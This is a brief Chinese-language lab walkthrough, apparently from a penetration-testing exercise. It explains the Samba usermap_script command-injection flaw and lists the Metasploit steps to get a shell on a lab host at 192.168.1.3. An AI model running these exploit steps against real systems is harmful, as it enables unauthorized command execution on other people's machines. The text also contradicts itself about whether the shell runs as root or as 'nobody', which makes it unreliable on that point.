目的
利用Samba漏洞,獲得目標(biāo)主機(jī)root權(quán)限.
原理
Samba中負(fù)責(zé)在SAM數(shù)據(jù)庫更新用戶口令的代碼未經(jīng)過濾便將用戶輸入傳輸給了/bin/sh.如果再調(diào)用smb.conf中定義的外部腳本時,通過對/bin/sh的MS-RPC調(diào)用提交了而已輸入的話,就可能允許攻擊者以nobody用戶的權(quán)限執(zhí)行任意命令.Samba服務(wù)端口:139\445.
攻擊環(huán)境
步驟
- 如前面幾個:掃端口,看服務(wù),查版本,找漏洞.
- 依次執(zhí)行:
msfconsole --> search samba --> use exploit/multi/samba/usermap_script --> info --> set RHOST 192.168.1.3(目標(biāo)ip) --> exploit --> whoami(輸入命令getshell)